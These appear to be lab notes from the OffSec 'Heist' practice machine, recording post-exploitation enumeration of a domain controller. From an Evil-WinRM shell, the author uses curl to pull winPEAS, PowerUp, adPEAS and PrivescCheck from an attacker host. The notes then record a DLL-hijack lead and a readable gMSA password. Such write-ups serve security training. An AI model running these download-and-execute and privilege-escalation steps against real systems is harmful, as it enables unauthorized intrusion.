PEAS
Conducting an automated enumeration after performing a manual enumeration on the dc01.heist.offsec(192.168.198.165) host.
*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/winPEASany.exe -OutFile C:\tmp\winPEASany.exeDelivery complete
Executing PEAS
ENV
ÉÍÍÍÍÍÍÍÍÍ͹ User Environment Variables
È Check for some passwords or keys in the env variables
COMPUTERNAME: DC01
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\enox\AppData\Local
PSModulePath: C:\Users\enox\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Program Files\Python39\Scripts\;C:\Program Files\Python39\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\enox\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW;.CPL
USERPROFILE: C:\Users\enox
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
USERNAME: enox
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
SystemDrive: C:
TEMP: C:\Users\enox\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\enox\AppData\Roaming
TMP: C:\Users\enox\AppData\Local\Temp
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: HEIST
USERDNSDOMAIN: heist.offsec
ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Program Files\Python39\Scripts\;C:\Program Files\Python39\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101N/A
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{AB1C51CD-3A66-48CC-9F4A-E9C30741D227}.png)
UAC
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{B47E1F77-3E4E-4FB7-87CF-87C118EAD442}.png)
PowerShell
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{2B69EF51-1CC0-4EB6-8C65-FE47E10D7D95}.png)
NTLM
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{7B65CF34-E368-4E0B-B5F6-FA49544AEDEB}.png)
Token Privileges (enox)
Services
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{BAE873D9-911C-4E77-B4FF-FC5494A31FC7}.png)
PowerUp.ps1
*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/PowerUp.ps1 -OutFile C:\tmp\PowerUp.ps1Delivery complete
*Evil-WinRM* PS C:\tmp> . .\PowerUp.ps1
*Evil-WinRM* PS C:\tmp> Invoke-AllChecks
Access denied
ModifiablePath : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
IdentityReference : HEIST\enox
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\enox\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'adPEAS
*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/adPEAS.ps1 -OutFile C:\tmp\adPEAS.ps1Delivery complete
Executing adPEAS
Domain
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{516F53D4-055B-4157-9140-92EFFB92D3FB}.png)
Add-Computer
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{62178032-6385-46F6-8066-94B89E2FE74F}.png)
gMSA
The enox user is able to read gMSA password of the svc_apache$ account.
Interesting
svc_apache$ is DC?
BloodHound
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{965E9BB7-1098-47E0-B921-7A7FED0C2793}.png)
*Evil-WinRM* PS C:\tmp> ls *.zip
s
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/7/2025 8:12 AM 11391 heist.offsec_20250707081211_BloodHound.zipIngestion complete.
PrivescCheck
*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/PrivescCheck.ps1 -OutFile C:\tmp\PrivescCheck.ps1Delivery complete
*Evil-WinRM* PS C:\tmp> . .\PrivescCheck.ps1
*Evil-WinRM* PS C:\tmp> Invoke-PrivescCheckExecuting PrivescCheck
Services
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Service list (non-default) ┃
┃ TYPE ┃ Base ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by ┃
┃ parsing the target executable's metadata and checking ┃
┃ whether the publisher is Microsoft. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
Name : FlaskService
DisplayName : FlaskService
ImagePath : C:\Program Files\nssm-2.24\win64\nssm.exe
User : HEIST\enox
StartMode : Automatic
Name : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath : C:\Windows\System32\OpenSSH\ssh-agent.exe
User : LocalSystem
StartMode : Disabled
Name : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User : LocalSystem
StartMode : Automatic
Name : VM3DService
DisplayName : @oem3.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath : C:\Windows\system32\vm3dservice.exe
User : LocalSystem
StartMode : Automatic
Name : VMTools
DisplayName : VMware Tools
ImagePath : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User : LocalSystem
StartMode : Automatic
[*] Status: Informational - Severity: None - Execution time: 00:00:01.441FlaskService
LSA Protection
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{7F81D7B7-DDA5-402B-A517-9D7FC57CC20F}.png)
Credential Guard
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{9AEB5519-A5BD-4239-9F21-9F0F1C5F65C5}.png)
LAPS
/Practice/Heist_OffSec/4-Post_Enumeration/attachments/{AB27B410-77F6-4568-8633-E2D2F2BDF079}.png)